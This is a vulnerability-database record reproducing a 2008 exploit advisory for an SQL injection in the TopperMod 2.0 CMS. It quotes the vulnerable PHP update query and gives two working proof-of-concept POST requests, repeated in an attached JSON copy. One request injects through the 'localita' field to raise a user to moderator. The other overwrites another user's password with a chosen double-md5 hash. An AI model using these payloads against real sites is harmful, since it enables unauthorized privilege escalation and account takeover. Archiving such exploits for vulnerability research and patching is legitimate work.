ID SECURITYVULNS:DOC:19525 Type securityvulns Reporter Securityvulns Modified 2008-03-27T00:00:00
Description
Author: GiReX
mySite: www.r57shell.in
CMS: TopperMod v2.0
Site: www.wikipediatr.com
Bug: SQL Injection
Type: 1 - Priviledge Escalation (from user to mod)
2 - Remote user password change
File: /account/index.php
Var : $localita
Need: magic_quotes_gpc = Off
You must be logged in
Vuln Code: /account/index.php:
case "edituser_save":
...
$localita=$_POST['localita'];
...
if ($localita!="") {
if (eregi("^[a-zA-Z0-9]",$localita)) {
$localita=substr(htmlentities(htmlspecialchars($localita), ENT_QUOTES),0,20);
}
}
And if our $_POST['localita'] does not begin with a char or a number?
Input not sanizated
...
$res=dbquery("UPDATE ".PREFISSO."_utenti SET email='$email', localita='$localita', sito='$sito',
tema='$tema_user', time_zone='$time_zone' $pass
WHERE user_id='$user_id' ");
Vulnerable query :D
PoC 1:
POST /[PATH]/mod.php?mod=account HTTP/1.1
Host: [TARGET]
...headers...
email=someone@somewhere.dot&localita=@', permessi='1&go=edituser_save&user_id=[YOUR_USER_ID]
PoC 2:
POST /[PATH]/mod.php?mod=account HTTP/1.1
Host: [TARGET]
...headers...
email=someone@somewhere.dot&localita=@', password='[PASSWORD]&go=edituser_save&user_id=[VICTIM_USER_ID]
Note: [PASSWORD] must be the md5 of the md5 of the wanted password, you must forget in the content the end quote
We can also try to get admin hash trought sql subqueries but the password is crypted into md5 2 times
and Admins don't use cookies in this CMS...
{"id": "SECURITYVULNS:DOC:19525", "bulletinFamily": "software", "title": "TopperMod 2.0 Remote SQL Injection Vulnerability", "description": "# Author: __GiReX__\r\n# mySite: www.r57shell.in\r\n\r\n# CMS: TopperMod v2.0\r\n# Site: www.wikipediatr.com\r\n\r\n# Bug: SQL Injection\r\n\r\n# Type: 1 - Priviledge Escalation (from user to mod)\r\n 2 - Remote user password change\r\n\r\n# File: /account/index.php\r\n# Var : $localita\r\n\r\n# Need: magic_quotes_gpc = Off\r\n You must be logged in\r\n\r\n\r\n# Vuln Code: /account/index.php: \r\n\r\n case "edituser_save":\r\n ...\r\n\r\n\r\n $localita=$_POST['localita']; \r\n ...\r\n\r\n if ($localita!="") { \r\n if (eregi("^[a-zA-Z0-9]",$localita)) {\r\n $localita=substr(htmlentities(htmlspecialchars($localita), ENT_QUOTES),0,20);\r\n }\r\n }\r\n\r\n# And if our $_POST['localita'] does not begin with a char or a number?\r\n# Input not sanizated\r\n \r\n ...\r\n $res=dbquery("UPDATE ".PREFISSO."_utenti SET email='$email', localita='$localita', sito='$sito', \r\n tema='$tema_user', time_zone='$time_zone' $pass \r\n WHERE user_id='$user_id' "); \r\n\r\n# Vulnerable query :D\r\n\r\n \r\n\r\n# PoC 1:\r\n\r\n POST /[PATH]/mod.php?mod=account HTTP/1.1\r\n Host: [TARGET]\r\n ...headers...\r\n\r\n email=someone@somewhere.dot&localita=@', permessi='1&go=edituser_save&user_id=[YOUR_USER_ID]\r\n\r\n# PoC 2:\r\n\r\n POST /[PATH]/mod.php?mod=account HTTP/1.1\r\n Host: [TARGET]\r\n ...headers...\r\n\r\n email=someone@somewhere.dot&localita=@', password='[PASSWORD]&go=edituser_save&user_id=[VICTIM_USER_ID]\r\n\r\n\r\n\r\n# Note: [PASSWORD] must be the md5 of the md5 of the wanted password, you must forget in the content the end quote\r\n# We can also try to get admin hash trought sql subqueries but the password is crypted into md5 2 times\r\n# and Admins don't use cookies in this CMS...", "published": "2008-03-27T00:00:00", "modified": "2008-03-27T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:19525", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:25", "edition": 1, "viewCount": 6, "enchantments": {"score": {"value": 1.6, "vector": "NONE"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:8841"]}], "rev": 4}, "backreferences": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:8841"]}]}, "exploitation": null, "vulnersScore": 1.6}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645323566}}